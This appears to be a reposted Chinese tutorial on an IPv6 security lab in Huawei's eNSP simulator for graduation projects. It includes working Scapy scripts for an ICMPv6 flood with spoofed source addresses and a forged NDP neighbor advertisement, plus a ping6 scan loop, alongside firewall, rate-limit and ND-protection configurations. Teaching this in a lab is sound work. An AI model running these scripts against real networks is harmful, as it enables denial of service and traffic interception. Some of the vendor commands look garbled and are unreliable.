当前位置：首页 > news >正文

毕业设计救星：基于华为eNSP的IPv6网络安全攻防实验全记录（含DDoS与地址欺骗防护）

news 2026/6/5 3:39:49

基于华为eNSP的IPv6网络安全攻防实验指南：从DDoS防御到地址欺骗防护

在计算机网络与信息安全专业的毕业设计中，能够将理论知识与实践操作相结合的课题往往最能体现学生的专业素养。而随着IPv6网络的普及，针对IPv6环境的安全攻防实验正成为越来越多同学的选择。本文将带你使用华为eNSP模拟器，从零开始构建一个完整的IPv6企业网络环境，并在这个环境中进行真实的安全攻防实验——包括攻击模拟、检测分析和防御配置的全过程。

1. 实验环境搭建与基础配置

1.1 eNSP环境准备与拓扑设计

首先确保你的计算机已经安装了最新版本的华为eNSP模拟器（当前推荐版本1.3.00）。实验拓扑采用典型的企业三层网络架构：

[公网PC]---[运营商路由器]---[防火墙]---[核心路由器]---[汇聚交换机]---[接入交换机]---[服务器区]

服务器区包含三台关键服务器：

Web服务器（提供企业门户网站）
DNS服务器（负责域名解析）
FTP服务器（用于文件传输）

提示：在eNSP中创建拓扑时，建议先放置设备再连线，这样可以避免设备启动顺序问题导致的连接异常。

基础网络配置步骤如下：

为所有设备配置IPv6地址，采用2001:db8:acad::/64地址段
在核心路由器与防火墙之间配置OSPFv3路由协议
汇聚交换机配置VRRPv6实现网关冗余
服务器区配置静态IPv6地址

# 示例：核心路由器基础配置 system-view sysname Core-Router ipv6 interface GigabitEthernet0/0/0 ipv6 enable ipv6 address 2001:db8:acad::1/64 ospfv3 1 area 0 quit

1.2 OSPFv3与VRRPv6关键配置

OSPFv3作为IPv6环境下的动态路由协议，其配置与IPv4环境下的OSPF有所不同。关键配置点包括：

路由器ID仍需使用IPv4格式的地址
需要在接口下明确启用OSPFv3进程
区域划分建议采用单区域简化设计

# 汇聚交换机OSPFv3配置示例 ospfv3 1 router-id 1.1.1.1 area 0 interface Vlanif10 ospfv3 1 area 0

VRRPv6配置则需要特别注意虚拟IPv6地址的设置：

# VRRPv6配置示例 interface Vlanif10 ipv6 enable ipv6 address 2001:db8:acad::ff/64 vrrp6 vrid 1 virtual-ip 2001:db8:acad::fe vrrp6 vrid 1 priority 120

2. IPv6网络攻击模拟实验

2.1 IPv6地址扫描与发现攻击

IPv6的巨大地址空间本应使扫描攻击变得困难，但实际中由于地址分配的可预测性，扫描仍然是可能的。我们使用公网PC模拟攻击者进行扫描：

# 使用ping6进行地址扫描（精简版） for i in {1..100}; do ping6 -c 1 2001:db8:acad::$i >/dev/null && echo "Host 2001:db8:acad::$i is up" done

更高效的扫描方式是利用ICMPv6邻居发现协议的特性：

发送ICMPv6 Echo Request到多播地址
捕获响应报文
分析活跃主机列表

注意：在实际网络中，这种扫描行为会产生大量流量，可能影响网络性能。

2.2 DDoS泛洪攻击模拟

在eNSP中，我们可以使用Python脚本模拟DDoS攻击：

#!/usr/bin/env python3 from scapy.all import * import random target = "2001:db8:acad::10" # Web服务器地址 count = 0 while True: src_addr = "2001:db8:bad::" + ":".join(["%x" % random.randint(0, 65535) for _ in range(4)]) send(IPv6(src=src_addr, dst=target)/ICMPv6EchoRequest(), verbose=0) count += 1 if count % 100 == 0: print(f"已发送 {count} 个攻击包")

攻击效果可以通过eNSP的抓包功能观察：

在防火墙外联接口启动抓包
观察ICMPv6请求包的源地址变化
监控服务器CPU和内存使用率

2.3 邻居发现协议(NDP)欺骗攻击

NDP是IPv6中替代ARP的协议，但也存在欺骗风险。攻击者可以伪造邻居通告(NA)报文：

# 使用scapy6发送伪造的NA报文 from scapy.all import * send(IPv6(src="2001:db8:acad::1", dst="ff02::1")/ICMPv6ND_NA(tgt="2001:db8:acad::1", R=0)/ICMPv6NDOptDstLLAddr(lladdr="00:11:22:33:44:55"), iface="eth0")

这种攻击会导致局域网内流量被重定向到攻击者指定的MAC地址。

3. 安全防护策略配置

3.1 防火墙基础防护策略

华为防火墙(以USG6000V为例)的基础防护配置包括：

# 创建地址组 ipv6 address-set Inside-Servers address 2001:db8:acad::10 128 # Web服务器 address 2001:db8:acad::20 128 # DNS服务器 address 2001:db8:acad::30 128 # FTP服务器 # 创建服务组 service-set Common-Services service protocol tcp destination-port 80 # HTTP service protocol tcp destination-port 443 # HTTPS service protocol udp destination-port 53 # DNS # 应用基础防护策略 security-policy rule name Outside-to-Inside source-zone untrust destination-zone trust destination-address address-set Inside-Servers service service-set Common-Services action permit rule name Deny-All action deny

3.2 DDoS防护专项配置

针对之前的ICMPv6泛洪攻击，我们可以配置限流策略：

# 配置ICMPv6流量限速 car icmpv6-car mode bandwidth cir 1024 # 1Mbps cql icmpv6-cql car icmpv6-car service-class icmpv6-class classifier icmpv6 behavior icmpv6-cql traffic-policy icmpv6-limit classifier icmpv6-class behavior icmpv6-cql interface GigabitEthernet1/0/0 traffic-policy icmpv6-limit inbound

同时启用防火墙的DDoS防护功能：

anti-ddos global enable icmpv6-flood enable threshold icmpv6-flood 100 # 每秒100个包

3.3 NDP防护与地址欺骗防御

针对NDP欺骗，可以在交换机上启用以下防护：

# 在接入交换机上配置 ipv6 nd detection ipv6 nd anti-attack duplicate-address-detection ipv6 nd anti-attack router-solicitation

防火墙上的源地址验证配置：

ipv6 source-guard policy sg-policy rule 1 prefix 2001:db8:acad::/64 interface GigabitEthernet1/0/1 ipv6 source-guard enable ipv6 source-guard policy sg-policy